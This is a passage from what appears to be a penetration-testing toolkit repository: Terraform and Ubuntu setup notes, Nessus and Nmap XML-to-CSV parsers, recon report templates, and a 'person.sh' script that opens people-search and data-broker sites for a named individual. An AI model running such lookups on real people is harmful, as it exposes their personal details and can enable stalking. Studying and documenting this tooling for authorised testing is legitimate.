 85 | output "instance_id" {
 86 |   description = "ID of payload instance"
 87 |   value       = aws_instance.payload.id
 88 | }
 89 | 
 90 | output "instance_ip" {
 91 |   description = "IP of the payload instance"
 92 |   value       = aws_instance.payload.public_ip
 93 | }
 94 | ------------------------------------------------------------------------------------------------------------------------------------------------------
 95 | 
 96 | The value for 'region' will be specific to your AWS user account.
 97 | 
 98 | ami-052efd3df9dad4825                         Ubuntu 22.04 LTS in the us-east-1 region.
 99 | ami-023b8c5033c21d95d                         Kali Linux 2022.3 in the us-east-1 region.
100 | ------------------------------------------------------------------------------------------------------------------------------------------------------
101 | 
102 | terraform init                                Initialize your directory
103 | terraform fmt                                 Format the config file
104 | terraform validate                            Validate the config file
105 | terraform apply                               Apply the config, type yes to approve
106 | 
107 | Your AWS Ubuntu instance should start to be created.
108 | ssh -i ~/.ssh/deploy.pem ubuntu@<public IP>
109 | 
110 | terraform show                                Inspect your current state
111 | terraform destroy                             Delete all of the instances you created
112 | 


--------------------------------------------------------------------------------
/notes/ubuntu.txt:
--------------------------------------------------------------------------------
 1 | Ubuntu
 2 | 
 3 | - Patch OS
 4 | Right-click on the Desktop > Open Terminal
 5 | sudo apt update; sudo apt -y upgrade; sudo apt -y dist-upgrade; sudo apt -y autoremove; sudo apt -y autoclean
 6 | 
 7 | - Install tools
 8 | sudo apt install -y curl gedit git jq mousepad net-tools nmap open-vm-tools-desktop plocate postgresql-client python3-pip redis-tools terminator whois xdotool
 9 | 
10 | Patch OS again and update locate database
11 | sudo apt update; sudo apt -y upgrade; sudo apt -y dist-upgrade; sudo apt -y autoremove; sudo apt -y autoclean; sudo updatedb

12 | 
13 | - Ignore case for tab completion
14 | echo set completion-ignore-case on | sudo tee -a /etc/inputrc
15 | 
16 | Close Terminal.
17 | 
18 | - Clean up
19 | Open Termitator
20 | rm -rf documents/ music/ pictures/ public/ templates/ videos/
21 | 
22 | - Settings
23 | Appearance: Dark
24 | Power:
25 | Screen Blank: Never
26 | 


--------------------------------------------------------------------------------
/parsers/parse-nessus.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | #
 3 | # Author  -- Alexander Sferrella
 4 | # Created -- 13 September, 2017
 5 | # Ported to python3 by Jay Townsend 2021-10-11
 6 | 
 7 | import argparse
 8 | from csv import QUOTE_ALL
 9 | import utfdictcsv
10 | import xml.etree.ElementTree as ET
11 | 
12 | # CSV and Nessus headers
13 | csvHeaders = ['CVSS Score', 'IP Address', 'FQDN', 'OS', 'Port', 'Vulnerability', 'Description', 'Proof', 'Solution', 'See Also', 'CVE']
14 | nessusFields = ['cvss_base_score', 'host-ip', 'host-fqdn', 'operating-system', 'port', 'plugin_name', 'description', 'plugin_output', 'solution', 'see_also', 'cve']
15 | 
16 | 
17 | def createCSV():
18 |     outFile = open('nessus.csv', 'wb')
19 |     csvWriter = utfdictcsv.DictUnicodeWriter(outFile, csvHeaders, quoting=QUOTE_ALL)
20 |     csvWriter.writeheader()
21 |     return csvWriter
22 | 
23 | 
24 | def getValue(rawValue):
25 |     # Clean values from Nessus report
26 |     cleanValue = rawValue.replace('\n', ' ').strip(' ')
27 |     if len(cleanValue) > 32000:
28 |         cleanValue = cleanValue[:32000] + ' [Trimmed due to length]'
29 |     return cleanValue
30 | 
31 | 
32 | def getKey(rawKey):
33 |     # Helper function for handleReport()
34 |     return csvHeaders[nessusFields.index(rawKey)]
35 | 
36 | 
37 | def handleReport(report):
38 |     # Handle a single report item
39 |     findings = []
40 |     reportHost = dict.fromkeys(csvHeaders, '')
41 |     for item in report:
42 |         if item.tag == 'HostProperties':
43 |             for tag in (tag for tag in item if tag.attrib['name'] in nessusFields):
44 |                 reportHost[getKey(tag.attrib['name'])] = getValue(tag.text)
45 |         if item.tag == 'ReportItem':
46 |             reportRow = dict(reportHost)
47 |             reportRow['Port'] = item.attrib['port']
48 |             reportRow['Vulnerability'] = item.attrib['pluginName']
49 |             for tag in (tag for tag in item if tag.tag in nessusFields):
50 |                 reportRow[getKey(tag.tag)] = getValue(tag.text)
51 |             # Clean up - Mike G
52 |             if reportRow['CVSS Score'] != "":
53 |                 findings.append(reportRow)
54 |     return findings
55 | 
56 | 
57 | def handleArgs():
58 |     # Get files
59 |     aparser = argparse.ArgumentParser(description='Converts Nessus scan findings from XML to a CSV file.', usage="\n./parse-nessus.py input.nessus\nAny fields longer than 32,000 characters will be truncated.")
60 |     aparser.add_argument('nessus_xml_files', type=str, nargs='+', help="nessus xml file to parse")
61 |     args = aparser.parse_args()
62 |     return args.nessus_xml_files
63 | 
64 | 
65 | if __name__ == '__main__':
66 |     reportRows = []
67 |     for nessusScan in handleArgs():
68 |         try:
69 |             scanFile = ET.parse(nessusScan)
70 |         except IOError:
71 |             print("Could not find file \"" + nessusScan + "\"")
72 |             exit()
73 |         xmlRoot = scanFile.getroot()
74 |         for report in xmlRoot.findall('./Report/ReportHost'):
75 |             findings = handleReport(report)
76 |             reportRows.extend(findings)
77 |     createCSV().writerows(reportRows)
78 | 


--------------------------------------------------------------------------------
/parsers/parse-nmap.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python3
  2 | #
  3 | # by Saviour Emmanuel
  4 | # Ported to python3 by Jay Townsend 2021-10-11
  5 | 
  6 | from xml.dom import minidom
  7 | 
  8 | 
  9 | class NMAP_XMLParser(object):
 10 |     def __init__(self, file_path):
 11 |         self._xml_object = object()
 12 |         self._xml_path = file_path
 13 |         self._output_path = str()
 14 |         self._csv_string = str()
 15 |         self._open_xml()
 16 | 
 17 |     def _open_xml(self):
 18 |         """Open the XML file on class construction"""
 19 |         self._xml_object = minidom.parse(self._xml_path)
 20 | 
 21 |     def setCSVPath(self, output_path):
 22 |         """Set the path to dump the CSV file"""
 23 |         if not output_path.lower().endswith(".csv"):
 24 |             output_path = output_path + ".csv"
 25 |         self._output_path = output_path
 26 | 
 27 |     def _iter_hosts(self):
 28 |         """Fetch the <host> tags from the XML file"""
 29 |         hosts_nodes = self._xml_object.getElementsByTagName("host")
 30 |         for host_node in hosts_nodes:
 31 |             yield host_node
 32 | 
 33 |     def _get_IP_Address(self, info):
 34 |         """Fetch the IP address from the XML object"""
 35 |         ip_address = str()
 36 |         info_detail = info.getElementsByTagName("address")
 37 |         for address in info_detail:
 38 |             if address.getAttribute("addrtype") == "ipv4":
 39 |                 ip_address = address.getAttribute("addr")
 40 |                 break
 41 | 
 42 |         return ip_address
 43 | 
 44 |     def _get_FQDN(self, info):
 45 |         """Get the FQDN aka domain/hostname"""
 46 |         fqdn = str()
 47 |         info_detail = info.getElementsByTagName("hostname")
 48 |         for hostname in info_detail:
 49 |             if hostname.getAttribute("name"):  # thanks to Kevin
 50 |                 fqdn = hostname.getAttribute("name")  # for the bug fix
 51 |                 break
 52 | 
 53 |         return fqdn
 54 | 
 55 |     def _get_OS(self, info):
 56 |         """Determine the OS by the greatest percentage in accuracy"""
 57 |         os = str()
 58 |         os_hash = dict()
 59 |         percentage = list()
 60 | 
 61 |         info_detail = info.getElementsByTagName("osmatch")
 62 | 
 63 |         for os_detail in info_detail:
 64 |             guessed_os = os_detail.getAttribute("name")
 65 |             accuracy = os_detail.getAttribute("accuracy")
 66 |             if guessed_os and accuracy:
 67 |                 os_hash[float(accuracy)] = guessed_os
 68 | 
 69 |         percentages = os_hash.keys()
 70 |         if percentages:
 71 |             max_percent = max(percentages)
 72 |             os = os_hash[max_percent]
 73 | 
 74 |         return os
 75 | 
 76 |     def _get_iter_Port_Information(self, info):
 77 |         """Fetch port and service information"""
 78 |         info_detail = info.getElementsByTagName("port")
 79 |         for port_details in info_detail:
 80 |             protocol = port_details.getAttribute("protocol")
 81 |             port_number = port_details.getAttribute("portid")
 82 | 
 83 |             port_service = port_details.getElementsByTagName("state")
 84 |             for port_services in port_service:
 85 |                 port_state = port_services.getAttribute("state")
 86 | 
 87 |                 if port_state == "open":
 88 | 
 89 |                     service_info = port_details.getElementsByTagName("service")
 90 |                     for service_details in service_info:
 91 |                         service = service_details.getAttribute("name")
 92 |                         product = service_details.getAttribute("product")
 93 |                         version = service_details.getAttribute("version")
 94 | 
 95 |                         yield port_number, protocol, service, product, version
 96 | 
 97 |     def _parse_XML_details(self):
 98 |         """Initiate parsing of nmap XML file and create CSV string object"""
 99 |         csv_header = "IP Address,FQDN,OS,Port,Protocol,Service,Name,Version\n"
100 |         csv_format = '{0},"{1}","{2}",{3},{4},"{5}","{6}","{7}"\n'
101 | 
102 |         self._csv_string += csv_header
103 | 
104 |         for info in self._iter_hosts():
105 |             ip = self._get_IP_Address(info)
106 |             fqdn = self._get_FQDN(info)
107 |             os = self._get_OS(info)
108 | 
109 |             for port, protocol, service, product, version in self._get_iter_Port_Information(info):
110 |                 self._csv_string += csv_format.format(ip, fqdn, os, port, protocol, service, product, version)
111 | 
112 |     def dumpCSV(self):
113 |         """Write CSV output file to disk"""
114 |         self._parse_XML_details()
115 | 
116 |         csv_output = open(self._output_path, "w")
117 |         csv_output.write(self._csv_string)
118 |         csv_output.close()
119 | 
120 | 
121 | if __name__ == "__main__":
122 |     nmap_xml = NMAP_XMLParser("nmap.xml")  # Input file
123 |     nmap_xml.setCSVPath("nmap.csv")  # Output file
124 |     nmap_xml.dumpCSV()
125 | 


--------------------------------------------------------------------------------
/parsers/utfdictcsv.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python3
 2 | #
 3 | # by John Kim
 4 | # Thanks to Securicon, LLC. for sponsoring development
 5 | #
 6 | # -*- coding:utf-8 -*-
 7 | #
 8 | # Last edited by Alexander Sferrella on 9/22/2017
 9 | # Ported to python3 by Jay Townsend 2021-10-11
10 | 
11 | import codecs
12 | from io import StringIO
13 | import csv
14 | 
15 | 
16 | ################################################################
17 | 
18 | 
19 | class DictUnicodeWriter(object):
20 | 
21 |     def __init__(self, f, fieldnames, dialect=csv.excel, encoding="utf-8", **kwds):
22 |         # Redirect output to a queue
23 |         self.queue = StringIO()
24 |         self.writer = csv.DictWriter(self.queue, fieldnames, dialect=dialect, **kwds)
25 |         self.stream = f
26 |         self.encoder = codecs.getincrementalencoder(encoding)()
27 | 
28 |     def writerow(self, D):
29 |         self.writer.writerow({k: v for k, v in D.items() if v})
30 | 
31 |         # Fetch UTF-8 output from the queue ...
32 |         data = self.queue.getvalue()
33 |         data = str.encode(data).decode("utf-8")
34 |         # ... and re-encode it into the target encoding
35 |         data = self.encoder.encode(data)
36 |         # Write to the target stream
37 |         self.stream.write(data)
38 |         # Empty queue
39 |         self.queue.truncate(0)
40 | 
41 |     def writerows(self, rows):
42 |         for D in rows:
43 |             self.writerow(D)
44 | 
45 |     def writeheader(self):
46 |         self.writer.writeheader()
47 | 


--------------------------------------------------------------------------------
/person.sh:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env bash
 2 | 
 3 | # by Lee Baird (@discoverscripts)
 4 | 
 5 | f_runlocally
 6 | clear
 7 | f_banner
 8 | 
 9 | # Check if Firefox is running
10 | if pgrep firefox > /dev/null; then
11 |     echo
12 |     echo "[!] Close Firefox before running script."
13 |     echo
14 |     exit 1
15 | fi
16 | 
17 | echo -e "${BLUE}RECON${NC}"
18 | echo
19 | echo -n "First name: "
20 | read -r FIRST
21 | 
22 | # Check for no answer
23 | if [ -z "$FIRST" ]; then
24 |     f_error
25 | fi
26 | 
27 | echo -n "Last name:  "
28 | read -r LAST
29 | 
30 | # Check for no answer
31 | if [ -z "$LAST" ]; then
32 |     f_error
33 | fi
34 | 
35 | xdg-open https://www.411.com/name/"$FIRST"-"$LAST"/ &
36 | sleep 2
37 | URIPATH="https://www.advancedbackgroundchecks.com/search/results.aspx?type=&fn=${FIRST}&mi=&ln=${LAST}&age=&city=&state="
38 | xdg-open "$URIPATH" &
39 | sleep 2
40 | xdg-open "https://www.familytreenow.com/search/genealogy/results?first=$FIRST&last=$LAST" &
41 | sleep 2
42 | xdg-open https://www.peekyou.com/"$FIRST"%5f"$LAST" &
43 | sleep 2
44 | xdg-open https://www.addresses.com/people/"$FIRST"+"$LAST" &
45 | sleep 2
46 | xdg-open https://radaris.com/p/"$FIRST"/"$LAST"/ &
47 | sleep 2
48 | xdg-open https://www.spokeo.com/"$FIRST"-"$LAST" &
49 | sleep 2
50 | xdg-open https://www.truepeoplesearch.com/results?name="$FIRST"%20"$LAST" &
51 | sleep 2
52 | xdg-open https://www.usphonebook.com/"$FIRST"-"$LAST" &
53 | sleep 2
54 | xdg-open https://www.facebook.com/public/"$FIRST"-"$LAST" &
55 | sleep 2
56 | xdg-open https://www.youtube.com/results?search_query="$FIRST"+"$LAST" &
57 | 


--------------------------------------------------------------------------------
/report/assets/fonts/FontAwesome.otf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leebaird/discover/42f1bdb12524a4f0330ae21f2c55030b58ff72d2/report/assets/fonts/FontAwesome.otf


--------------------------------------------------------------------------------
/report/assets/fonts/fontawesome-webfont.eot:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leebaird/discover/42f1bdb12524a4f0330ae21f2c55030b58ff72d2/report/assets/fonts/fontawesome-webfont.eot


--------------------------------------------------------------------------------
/report/assets/fonts/fontawesome-webfont.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leebaird/discover/42f1bdb12524a4f0330ae21f2c55030b58ff72d2/report/assets/fonts/fontawesome-webfont.ttf


--------------------------------------------------------------------------------
/report/assets/fonts/fontawesome-webfont.woff:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leebaird/discover/42f1bdb12524a4f0330ae21f2c55030b58ff72d2/report/assets/fonts/fontawesome-webfont.woff


--------------------------------------------------------------------------------
/report/assets/fonts/ironvue-icons.eot:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leebaird/discover/42f1bdb12524a4f0330ae21f2c55030b58ff72d2/report/assets/fonts/ironvue-icons.eot


--------------------------------------------------------------------------------
/report/assets/fonts/ironvue-icons.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leebaird/discover/42f1bdb12524a4f0330ae21f2c55030b58ff72d2/report/assets/fonts/ironvue-icons.ttf


--------------------------------------------------------------------------------
/report/assets/fonts/ironvue-icons.woff:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leebaird/discover/42f1bdb12524a4f0330ae21f2c55030b58ff72d2/report/assets/fonts/ironvue-icons.woff


--------------------------------------------------------------------------------
/report/assets/fonts/ironvue-icons.woff2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leebaird/discover/42f1bdb12524a4f0330ae21f2c55030b58ff72d2/report/assets/fonts/ironvue-icons.woff2


--------------------------------------------------------------------------------
/report/assets/images/banner.svg:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <!-- Generator: Adobe Illustrator 21.1.0, SVG Export Plug-In . SVG Version: 6.00 Build 0)  -->
 3 | <svg version="1.1" id="Layer_2" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"
 4 | 	 viewBox="0 0 144 31.9" style="enable-background:new 0 0 144 31.9;" xml:space="preserve">
 5 | <style type="text/css">
 6 | 	.st0{fill:#FFFFFF;}
 7 | </style>
 8 | <g>
 9 | 	<path class="st0" d="M0,20.7v-9.6h2.5c1.1,0,2,0.4,2.7,1.1c0.7,0.7,1,1.7,1,2.9v1.6c0,1.3-0.3,2.2-1,3c-0.7,0.7-1.6,1.1-2.7,1.1H0z
10 | 		 M1.9,12.8v6.4h0.6c0.6,0,1.1-0.2,1.4-0.5s0.4-0.9,0.4-1.8v-1.7c0-0.9-0.1-1.5-0.4-1.9c-0.2-0.4-0.7-0.5-1.3-0.6H1.9z"/>
11 | 	<path class="st0" d="M9.6,20.7H7.7v-9.6h1.9V20.7z"/>
12 | 	<path class="st0" d="M15.3,18.2c0-0.4-0.1-0.7-0.3-0.9s-0.6-0.4-1.1-0.6c-1-0.4-1.7-0.8-2.1-1.3c-0.4-0.5-0.6-1.1-0.6-1.7
13 | 		c0-0.8,0.3-1.5,0.9-1.9c0.6-0.5,1.3-0.7,2.2-0.7c0.6,0,1.1,0.1,1.6,0.4c0.5,0.2,0.8,0.6,1.1,1c0.2,0.5,0.4,1,0.4,1.5h-1.9
14 | 		c0-0.4-0.1-0.8-0.3-1c-0.2-0.2-0.5-0.4-0.8-0.4c-0.3,0-0.6,0.1-0.8,0.3c-0.2,0.2-0.3,0.5-0.3,0.8c0,0.3,0.1,0.5,0.3,0.7
15 | 		c0.2,0.2,0.6,0.4,1.1,0.7c0.9,0.3,1.6,0.8,2,1.2c0.4,0.5,0.6,1.1,0.6,1.9c0,0.8-0.3,1.5-0.8,2c-0.5,0.5-1.3,0.7-2.2,0.7
16 | 		c-0.6,0-1.2-0.1-1.7-0.4c-0.5-0.3-0.9-0.6-1.2-1.1c-0.3-0.5-0.4-1-0.4-1.7h1.9c0,0.6,0.1,1,0.3,1.2c0.2,0.3,0.6,0.4,1.1,0.4
17 | 		C15,19.3,15.3,18.9,15.3,18.2z"/>
18 | 	<path class="st0" d="M25,17.5c0,1.1-0.4,1.9-0.9,2.5c-0.6,0.6-1.4,0.8-2.4,0.8c-1.1,0-1.9-0.4-2.5-1.1c-0.6-0.7-0.9-1.7-0.9-3v-1.6
19 | 		c0-1.3,0.3-2.3,0.9-3c0.6-0.7,1.4-1.1,2.5-1.1c1,0,1.8,0.3,2.4,0.9c0.5,0.6,0.8,1.4,0.9,2.5h-1.9c0-0.7-0.1-1.1-0.3-1.4
20 | 		c-0.2-0.3-0.5-0.4-1-0.4c-0.5,0-0.9,0.2-1.1,0.5c-0.2,0.4-0.3,1-0.3,1.8v1.8c0,1,0.1,1.6,0.3,2c0.2,0.4,0.6,0.5,1.1,0.5
21 | 		c0.5,0,0.9-0.1,1.1-0.4c0.2-0.2,0.3-0.7,0.3-1.3H25z"/>
22 | 	<path class="st0" d="M32.9,16.8c0,1.3-0.3,2.3-0.9,3c-0.6,0.7-1.5,1.1-2.5,1.1c-1.1,0-1.9-0.4-2.5-1.1c-0.6-0.7-0.9-1.7-0.9-3v-1.6
23 | 		c0-1.3,0.3-2.3,0.9-3.1c0.6-0.7,1.5-1.1,2.5-1.1c1.1,0,1.9,0.4,2.5,1.1c0.6,0.7,0.9,1.7,0.9,3.1V16.8z M31,15.2
24 | 		c0-0.9-0.1-1.5-0.4-1.9c-0.2-0.4-0.6-0.6-1.1-0.6c-0.5,0-0.9,0.2-1.1,0.6c-0.2,0.4-0.4,1-0.4,1.9v1.7c0,0.8,0.1,1.5,0.4,1.9
25 | 		c0.2,0.4,0.6,0.6,1.2,0.6c0.5,0,0.9-0.2,1.1-0.6c0.2-0.4,0.4-1,0.4-1.8V15.2z"/>
26 | 	<path class="st0" d="M37.3,18.1l1.6-6.9h2.2l-2.8,9.6h-2l-2.7-9.6h2.1L37.3,18.1z"/>
27 | 	<path class="st0" d="M46.9,16.6h-3v2.5h3.6v1.6H42v-9.6h5.5v1.6h-3.6V15h3V16.6z"/>
28 | 	<path class="st0" d="M51.5,17.2h-1v3.5h-1.9v-9.6h3.1c1,0,1.7,0.3,2.2,0.8c0.5,0.5,0.8,1.2,0.8,2.1c0,1.3-0.5,2.2-1.4,2.7l1.7,3.9
29 | 		v0.1h-2.1L51.5,17.2z M50.5,15.6h1.1c0.4,0,0.7-0.1,0.9-0.4c0.2-0.3,0.3-0.6,0.3-1c0-1-0.4-1.4-1.1-1.4h-1.1V15.6z"/>
30 | </g>
31 | </svg>
32 | 


--------------------------------------------------------------------------------
/report/assets/images/icons/fail.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leebaird/discover/42f1bdb12524a4f0330ae21f2c55030b58ff72d2/report/assets/images/icons/fail.png


--------------------------------------------------------------------------------
/report/assets/images/icons/info.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leebaird/discover/42f1bdb12524a4f0330ae21f2c55030b58ff72d2/report/assets/images/icons/info.png


--------------------------------------------------------------------------------
/report/assets/images/icons/pass.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leebaird/discover/42f1bdb12524a4f0330ae21f2c55030b58ff72d2/report/assets/images/icons/pass.png


--------------------------------------------------------------------------------
/report/assets/images/icons/warn.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leebaird/discover/42f1bdb12524a4f0330ae21f2c55030b58ff72d2/report/assets/images/icons/warn.png


--------------------------------------------------------------------------------
/report/assets/images/logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/leebaird/discover/42f1bdb12524a4f0330ae21f2c55030b58ff72d2/report/assets/images/logo.png


--------------------------------------------------------------------------------
/report/data/doc.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html lang="en">
 3 | <head>
 4 |     <meta http-equiv="content-type" content="text/html; charset=UTF-8">
 5 |     <meta charset="utf-8">
 6 |     <title>Reporting Framework</title>
 7 |     <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
 8 |     <!-- CSS -->
 9 |     <link rel="stylesheet" type="text/css" href="../assets/css/styles.css"/>
10 | </head>
11 | 
12 | <body>
13 | <pre>
14 | 
15 | 


--------------------------------------------------------------------------------
/report/data/emails.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html lang="en">
 3 | <head>
 4 |     <meta http-equiv="content-type" content="text/html; charset=UTF-8">
 5 |     <meta charset="utf-8">
 6 |     <title>Reporting Framework</title>
 7 |     <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
 8 |     <!-- CSS -->
 9 |     <link rel="stylesheet" type="text/css" href="../assets/css/styles.css"/>
10 | </head>
11 | 
12 | <body>
13 | <pre>
14 | 
15 | 


--------------------------------------------------------------------------------
/report/data/hosts.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html lang="en">
 3 | <head>
 4 |     <meta http-equiv="content-type" content="text/html; charset=UTF-8">
 5 |     <meta charset="utf-8">
 6 |     <title>Reporting Framework</title>
 7 |     <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
 8 |     <!-- CSS -->
 9 |     <link rel="stylesheet" type="text/css" href="../assets/css/styles.css"/>
10 | </head>
11 | 
12 | <body>
13 | <pre>
14 | 


--------------------------------------------------------------------------------
/report/data/names.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html lang="en">
 3 | <head>
 4 |     <meta http-equiv="content-type" content="text/html; charset=UTF-8">
 5 |     <meta charset="utf-8">
 6 |     <title>Reporting Framework</title>
 7 |     <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
 8 |     <!-- CSS -->
 9 |     <link rel="stylesheet" type="text/css" href="../assets/css/styles.css"/>
10 | </head>
11 | 
12 | <body>
13 | <pre>
14 | 
15 | 


--------------------------------------------------------------------------------
/report/data/passive-recon.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html lang="en">
 3 | <head>
 4 |     <meta http-equiv="content-type" content="text/html; charset=UTF-8">
 5 |     <meta charset="utf-8">
 6 |     <title>Reporting Framework</title>
 7 |     <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
 8 |     <!-- CSS -->
 9 |     <link rel="stylesheet" type="text/css" href="../assets/css/styles.css"/>
10 | </head>
11 | 
12 | <body>
13 | <pre>
14 | 
15 | 


--------------------------------------------------------------------------------
/report/data/pdf.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html lang="en">
 3 | <head>
 4 |     <meta http-equiv="content-type" content="text/html; charset=UTF-8">
 5 |     <meta charset="utf-8">
 6 |     <title>Reporting Framework</title>
 7 |     <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
 8 |     <!-- CSS -->
 9 |     <link rel="stylesheet" type="text/css" href="../assets/css/styles.css"/>
10 | </head>
11 | 
12 | <body>
13 | <pre>
14 | 
15 | 


--------------------------------------------------------------------------------
/report/data/ppt.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html lang="en">
 3 | <head>
 4 |     <meta http-equiv="content-type" content="text/html; charset=UTF-8">
 5 |     <meta charset="utf-8">
 6 |     <title>Reporting Framework</title>
 7 |     <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
 8 |     <!-- CSS -->
 9 |     <link rel="stylesheet" type="text/css" href="../assets/css/styles.css"/>
10 | </head>
11 | 
12 | <body>
13 | <pre>
14 | 
15 | 


--------------------------------------------------------------------------------
/report/data/records.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html lang="en">
 3 | <head>
 4 |     <meta http-equiv="content-type" content="text/html; charset=UTF-8">
 5 |     <meta charset="utf-8">
 6 |     <title>Reporting Framework</title>
 7 |     <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
 8 |     <!-- CSS -->
 9 |     <link rel="stylesheet" type="text/css" href="../assets/css/styles.css"/>
10 | </head>
11 | 
12 | <body>
13 | <pre>
14 | 
15 | 


--------------------------------------------------------------------------------
/report/data/registered-domains.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html lang="en">
 3 | <head>
 4 |     <meta http-equiv="content-type" content="text/html; charset=UTF-8">
 5 |     <meta charset="utf-8">
 6 |     <title>Reporting Framework</title>
 7 |     <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
 8 |     <!-- CSS -->
 9 |     <link rel="stylesheet" type="text/css" href="../assets/css/styles.css"/>
10 | </head>
11 | 
12 | <body>
13 | <pre>
14 | 
15 | Run Domain > Find registered domains.
16 | Paste the results here.
17 | </pre>
18 | </body>
19 | 


--------------------------------------------------------------------------------
/report/data/squatting.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html lang="en">
 3 | <head>
 4 |     <meta http-equiv="content-type" content="text/html; charset=UTF-8">
 5 |     <meta charset="utf-8">
 6 |     <title>Reporting Framework</title>
 7 |     <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
 8 |     <!-- CSS -->
 9 |     <link rel="stylesheet" type="text/css" href="../assets/css/styles.css"/>
10 | </head>
11 | 
12 | <body>
13 | <pre>
14 | 
15 | 


--------------------------------------------------------------------------------
/report/data/subdomains.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html lang="en">
 3 | <head>
 4 |     <meta http-equiv="content-type" content="text/html; charset=UTF-8">
 5 |     <meta charset="utf-8">
 6 |     <title>Reporting Framework</title>
 7 |     <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
 8 |     <!-- CSS -->
 9 |     <link rel="stylesheet" type="text/css" href="../assets/css/styles.css"/>
10 | </head>
11 | 
12 | <body>
13 | <pre>
14 | 
15 | 


--------------------------------------------------------------------------------
/report/data/summary.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html lang="en">
 3 | <head>
 4 |     <meta http-equiv="content-type" content="text/html; charset=UTF-8">
 5 |     <meta charset="utf-8">
 6 |     <title>Reporting Framework</title>
 7 |     <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
 8 |     <!-- CSS -->
 9 |     <link rel="stylesheet" type="text/css" href="../assets/css/styles.css"/>
10 | </head>
11 | 
12 | <body>
13 | <pre>
14 | 
15 | Company
16 | 
17 | Address
18 | City, State Zip
19 | Phone
20 | URL
21 | ===============================================================================================================================
22 | 
23 | # Summary paragraph about the company.
24 | 
25 | https://finance.yahoo.com
26 | https://www.google.com/finance
27 | https://www.reuters.com/finance/stocks/lookup
28 | https://www.sec.gov/edgar/searchedgar/companysearch.html
29 | 
30 | Accourding to Justia Dockets & Filings, COMPANY is currently involved in ### cases.
31 | https://dockets.justia.com/search?parties=%22COMPANY%22
32 | ===============================================================================================================================
33 | 
34 | Social Media     URL                                                       Followers
35 | 
36 | facebook         https://www.facebook.com/                                 xxx
37 | Instagram        https://www.instagram.com/                                xxx
38 | Linkedin         https://www.linkedin.com/company/                         xxx
39 | Pinterest        https://www.pinterest.com/                                xxx
40 | Twitter          https://twitter.com/                                      xxx
41 | YouTube          https://www.youtube.com/                                  xxx
42 | ===============================================================================================================================
43 | 
44 | Google Dork                             Results
45 | 
46 | 
47 | </pre>
48 | 


--------------------------------------------------------------------------------
/report/data/txt.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html lang="en">
 3 | <head>
 4 |     <meta http-equiv="content-type" content="text/html; charset=UTF-8">
 5 |     <meta charset="utf-8">
 6 |     <title>Reporting Framework</title>
 7 |     <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
 8 |     <!-- CSS -->
 9 |     <link rel="stylesheet" type="text/css" href="../assets/css/styles.css"/>
10 | </head>
11 | 
12 | <body>
13 | <pre>
14 | 
15 | 


--------------------------------------------------------------------------------
/report/data/whois-domain.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html lang="en">
 3 | <head>
 4 |     <meta http-equiv="content-type" content="text/html; charset=UTF-8">
 5 |     <meta charset="utf-8">
 6 |     <title>Reporting Framework</title>
 7 |     <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
 8 |     <!-- CSS -->
 9 |     <link rel="stylesheet" type="text/css" href="../assets/css/styles.css"/>
10 | </head>
11 | 
12 | <body>
13 | <pre>
14 | 
15 | 


--------------------------------------------------------------------------------
/report/data/whois-ip.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html lang="en">
 3 | <head>
 4 |     <meta http-equiv="content-type" content="text/html; charset=UTF-8">
 5 |     <meta charset="utf-8">
 6 |     <title>Reporting Framework</title>
 7 |     <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
